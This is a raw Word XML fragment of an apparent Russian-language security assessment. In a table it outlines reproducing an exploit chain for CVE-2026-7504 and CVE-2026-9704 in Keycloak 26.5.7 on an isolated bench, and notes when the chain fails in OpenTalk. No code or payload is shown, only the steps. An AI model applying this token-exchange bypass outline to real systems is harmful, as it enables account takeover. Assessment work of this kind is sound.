                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>В Open</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Cloak</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> не </w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">уязвима </w:t>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref234285639 \r \h \</w:instrText>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText>t</w:instrText>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>рисунок</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.1</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">, так как символ </w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:t xml:space="preserve">» не используется в </w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C71E36" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>redirect_uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00411926">
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w14:paraId="0502B5AB" w14:textId="77777777" w:rsidTr="008C7BD5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66614FEB" w14:textId="3EB7270A" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00C71E36" w:rsidP="006804DB">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E43E794" w14:textId="688798D3" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00C71E36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>Вход в приложение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E17E03F" w14:textId="0C72120F" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00C71E36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t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>2026-7504</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00087F8B">
              <w:t>» не дала доступ к аккаунту, для завершения цепочки, предположим, что существует доступ к аккаунту в ПО</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w14:paraId="1C1EF7F0" w14:textId="77777777" w:rsidTr="008C7BD5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E5FC52B" w14:textId="0F2B82EC" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00C71E36" w:rsidP="006804DB">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B1BCD1A" w14:textId="2834E89E" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74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 xml:space="preserve">Получение токена </w:t>
            </w:r>
            <w:r w:rsidR="00557FDB" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>пользователя</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> «</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CVE-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00557FDB" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>2026-9704</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00557FDB" w:rsidRPr="00087F8B">
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4498270D" w14:textId="435FF3FC" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74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 xml:space="preserve">Нужно получить токен, с которым в последствии будет происходить обмен, используем </w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="001E0634">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001E0634">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref234286213 \r \h \</w:instrText>
            </w:r>
            <w:r w:rsidR="001E0634">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText>t</w:instrText>
            </w:r>
            <w:r w:rsidR="001E0634">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001E0634">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>рисунок</w:t>
            </w:r>
            <w:r w:rsidR="001E0634">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.2</w:t>
            </w:r>
            <w:r w:rsidR="001E0634">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>, для получения токена через авторизацию</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w14:paraId="120B83CD" w14:textId="77777777" w:rsidTr="008C7BD5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9AC9E5" w14:textId="58A5C81E" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74" w:rsidP="006804DB">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76401F3E" w14:textId="60C9CAAB" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74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>Создание полезной нагрузки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14FB918D" w14:textId="0298F230" w:rsidR="008C7BD5" w:rsidRPr="00C54DEE" w:rsidRDefault="00C16747" w:rsidP="006804DB">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>При проверке размера</w:t>
            </w:r>
            <w:r w:rsidR="00FF7E74" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> серверная логика в процессе валидации игнорирует токен (не отклоняя запрос с ошибкой), а обмен токенами при этом всё равно продолжает выполняться. Для этого создаем полезную нагрузку</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref234290763 \r \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText>\t</w:instrText>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>листинг</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.2</w:t>
            </w:r>
            <w:r w:rsidR="00C54DEE">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w14:paraId="037AA5E4" w14:textId="77777777" w:rsidTr="008C7BD5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19C3BC33" w14:textId="501A176F" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74" w:rsidP="006804DB">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0517B23E" w14:textId="0240E529" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74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>Обмен токенами</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="791DB376" w14:textId="0CE44157" w:rsidR="008C7BD5" w:rsidRPr="00C54DEE" w:rsidRDefault="00FF7E74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 xml:space="preserve">Для обмена обязательно </w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">нужен </w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>client</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>secret</w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">, из-за ограничения нужен аккаунт с привилегиями, либо найти </w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>client</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>secret</w:t>
            </w:r>
            <w:r w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> иным способом</w:t>
            </w:r>
            <w:r w:rsidR="00557FDB">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref234290763 \r \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000F2390" w:rsidRPr="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText>\</w:instrText>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText>t</w:instrText>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>листинг 2.2</w:t>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="000F2390">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w14:paraId="7C2693E0" w14:textId="77777777" w:rsidTr="008C7BD5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64A0808B" w14:textId="1401EEC5" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74" w:rsidP="006804DB">
            <w:pPr>
              <w:pStyle w:val="114"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00087F8B">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C70475C" w14:textId="6AEE30D8" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74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>Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A6E7FB7" w14:textId="6FEDA864" w:rsidR="008C7BD5" w:rsidRPr="00087F8B" w:rsidRDefault="00FF7E74" w:rsidP="006804DB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 xml:space="preserve">Из-за некоторых ограничений эксплойт не будет работать </w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">в ПО </w:t>
            </w:r>
            <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
              <w:t>«</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
              <w:t>OpenTalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t xml:space="preserve">. Для воспроизведения </w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">уязвимости нужны определенные условия, «JWT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t>Authorization</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t xml:space="preserve"> Grant» в версии 26.5.7 он существует, но в контексте </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003A5828">
              <w:t>OpenTalk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t xml:space="preserve">, его нет. Также в </w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t xml:space="preserve"> должен быть включен </w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t xml:space="preserve">Service </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t>Token</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t xml:space="preserve"> Exchange</w:t>
            </w:r>
            <w:r w:rsidR="00411926" w:rsidRPr="00087F8B">
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidR="00C16747" w:rsidRPr="00087F8B">
              <w:t>. При этих условиях эксплойт будет работать.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72725F69" w14:textId="77777777" w:rsidR="006804DB" w:rsidRDefault="006804DB" w:rsidP="006804DB">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1525C2C2" w14:textId="377E9227" w:rsidR="00604BD8" w:rsidRPr="006804DB" w:rsidRDefault="00604BD8" w:rsidP="006804DB">
      <w:pPr>
        <w:pStyle w:val="114"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00604BD8">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>В ходе воспроизведения цепочки 1 на изолированном стенде</w:t>
      </w:r>
      <w:r w:rsidR="00087F8B">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00604BD8">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">установлено, что уязвимости </w:t>
      </w:r>
      <w:r w:rsidR="00087F8B">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00087F8B" w:rsidRPr="008C7BD5">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00087F8B" w:rsidRPr="008C7BD5">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>2026-7504</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00087F8B">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00497FAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00604BD8">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00087F8B">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00087F8B" w:rsidRPr="00C71E36">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>CVE-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00087F8B" w:rsidRPr="00C71E36">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>2026-9704</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00087F8B">
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidRPr="00604BD8">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">в версии </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Keycloak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00604BD8">
        <w:rPr>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>26.5.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00604BD8">
        <w:rPr>
